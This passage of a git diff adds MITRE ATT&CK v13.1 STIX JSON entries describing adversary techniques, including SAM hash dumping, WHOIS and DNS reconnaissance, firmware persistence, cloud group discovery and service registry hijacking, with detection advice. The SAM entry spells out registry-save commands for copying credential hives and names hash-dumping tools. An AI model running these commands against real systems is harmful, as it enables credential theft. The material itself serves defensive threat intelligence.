Enumerating the SAM database requires SYSTEM level access.\n\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe\n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)\n\nNotes: \n\n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.\n", + "modified": "2022-06-15T16:17:19.049Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Security Account Manager", + "x_mitre_detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "File: File Access", + "Command: Command Execution", + "Windows Registry: Windows Registry Key Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f.json new file mode 100644 index 0000000000000000000000000000000000000000..739f866a15b9673f46895824a5b51a775138183a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--60ff411b-a151-4f4a-8712-f82df14924a6", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", + "type": "attack-pattern", + "created": "2020-10-02T16:56:49.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.002", + "url": "https://attack.mitre.org/techniques/T1596/002" + }, + { + "source_name": "WHOIS", + "url": "https://www.whois.net/", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:50:44.113Z", + "name": "WHOIS", + "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. 
Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada.json new file mode 100644 index 0000000000000000000000000000000000000000..82d4a45c908c35c547d69209feb92811b992cbf4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada.json 
@@ -0,0 +1,104 @@ +{ + "type": "bundle", + "id": "bundle--91f97fd6-b3d7-4e80-81fa-1fc5e1f81f82", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:49.493Z", + "name": "System Firmware", + "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Jean-Ian Boutin, ESET", + "McAfee", + "Ryan Becwar" + ], + "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. 
(Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Firmware: Firmware Modification" + ], + "x_mitre_defense_bypassed": [ + "Host intrusion prevention systems", + "Anti-virus", + "File monitoring" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "id": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "created": "2019-12-19T19:43:34.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/001", + "external_id": "T1542.001" + }, + { + "source_name": "Wikipedia BIOS", + "description": "Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.", + "url": "https://en.wikipedia.org/wiki/BIOS" + }, + { + "source_name": "Wikipedia UEFI", + "description": "Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.", + "url": "https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface" + }, + { + "source_name": "About UEFI", + "description": "UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.", + "url": "http://www.uefi.org/about" + }, + { + "source_name": "MITRE Trustworthy Firmware Measurement", + "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.", + "url": "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research" + }, + { + "source_name": "MITRE Copernicus", + "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. 
Retrieved December 11, 2015.", + "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" + }, + { + "source_name": "McAfee CHIPSEC Blog", + "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", + "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" + }, + { + "source_name": "Github CHIPSEC", + "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", + "url": "https://github.com/chipsec/chipsec" + }, + { + "source_name": "Intel HackingTeam UEFI Rootkit", + "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", + "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26.json new file mode 100644 index 0000000000000000000000000000000000000000..b86d53266c9727a2d37d523b03d3bebdffedf1d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--ef994783-cf01-4e86-8fc9-7c1f32c4036c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26", + "type": "attack-pattern", + "created": "2020-10-02T16:51:50.306Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1594", + "url": "https://attack.mitre.org/techniques/T1594" + }, + { + "source_name": "Comparitech Leak", + "url": "https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/", + "description": "Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:53:33.023Z", + "name": "Search Victim-Owned Websites", + "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. 
Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Application Log: Application Log Content" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2.json new file mode 100644 index 0000000000000000000000000000000000000000..43a95575377f9135c5c23f20f417398c70bf54a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2.json 
@@ -0,0 +1,95 @@ +{ + "type": "bundle", + "id": "bundle--da5f17eb-9281-4ea1-8050-85a588c4a28e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T13:33:40.625Z", + "name": "Cloud Groups", + "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). 
Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_contributors": [ + "Regina Elwell", + "Isif Ibrahima, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Google Workspace" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [ + "Group: Group Enumeration", + "Application Log: Application Log Content", + "Process: Process Creation", + "Command: Command Execution", + "Group: Group Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", + "created": "2020-02-21T21:15:33.222Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1069/003", + "external_id": "T1069.003" + }, + { + "source_name": "AWS Get Bucket ACL", + "description": "Amazon Web Services. (n.d.). 
Retrieved May 28, 2021.", + "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html" + }, + { + "source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022", + "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.", + "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/" + }, + { + "source_name": "Black Hills Red Teaming MS AD Azure, 2018", + "description": "Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.", + "url": "https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/" + }, + { + "source_name": "Google Cloud Identity API Documentation", + "description": "Google. (n.d.). Retrieved March 16, 2021.", + "url": "https://cloud.google.com/identity/docs/reference/rest" + }, + { + "source_name": "Microsoft AZ CLI", + "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest" + }, + { + "source_name": "Microsoft Msolrole", + "description": "Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0" + }, + { + "source_name": "GitHub Raindance", + "description": "Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.", + "url": "https://github.com/True-Demon/raindance" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c.json new file mode 100644 index 0000000000000000000000000000000000000000..22a329450fc4fee255c228d3112e0407d417bdeb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c.json 
@@ -0,0 +1,113 @@ +{ + "type": "bundle", + "id": "bundle--0d8e98f4-adef-42d8-bb05-ba36b2280f13", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:38.651Z", + "name": "Services Registry Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service\u2019s Registry tree. 
For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service\u2019s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service\u2019s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Matthew Demaske, Adaptforward" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Service: Service Modification", + "Windows Registry: Windows Registry Key Modification", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", + "created": "2020-03-13T11:42:14.444Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/011", + "external_id": "T1574.011" + }, + { + "source_name": "Tweet Registry Perms Weakness", + "description": "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", + "url": "https://twitter.com/r0wdy_/status/936365549553991680" + }, + { + "source_name": "insecure_reg_perms", + "description": "Cl\u00e9ment Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.", + "url": "https://itm4n.github.io/windows-registry-rpceptmapper-eop/" + }, + { + "source_name": "Kansa Service related collectors", + "description": "Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.", + "url": "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html" + }, + { + "source_name": "malware_hides_service", + "description": "Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.", + "url": "https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/" + }, + { + "source_name": "Autoruns for Windows", + "description": "Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" + }, + { + "source_name": "Registry Key Security", + "description": "Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN" + }, + { + "source_name": "microsoft_services_registry_tree", + "description": "Microsoft. (2021, August 5). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. 
Retrieved August 25, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree" + }, + { + "source_name": "troj_zegost", + "description": "Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532.json new file mode 100644 index 0000000000000000000000000000000000000000..5d9e988e94c81e071dc930b0bff06c99fc634bd0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--e85f8a47-e230-4321-8f6e-d34453e79b59", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", + "type": "attack-pattern", + "created": "2020-10-02T16:57:45.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.001", + "url": "https://attack.mitre.org/techniques/T1596/001" + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:49:13.409Z", + "name": "DNS/Passive DNS", + "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target\u2019s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. 
Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f.json new file mode 100644 index 0000000000000000000000000000000000000000..63615363b135d1132b5bcea2f07aeb04add35671 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--fe647964-c998-4c7c-bc69-f524d1c8b5d5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", + "type": "attack-pattern", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1163", + "url": "https://attack.mitre.org/techniques/T1163" + }, + { + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html", + "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", + "source_name": "Startup Items" + }, + { + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "source_name": "Methods of Mac Malware Persistence" + } + ], + "modified": "2020-01-15T16:27:32.362Z", + "name": "Rc.common", + "description": "During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). 
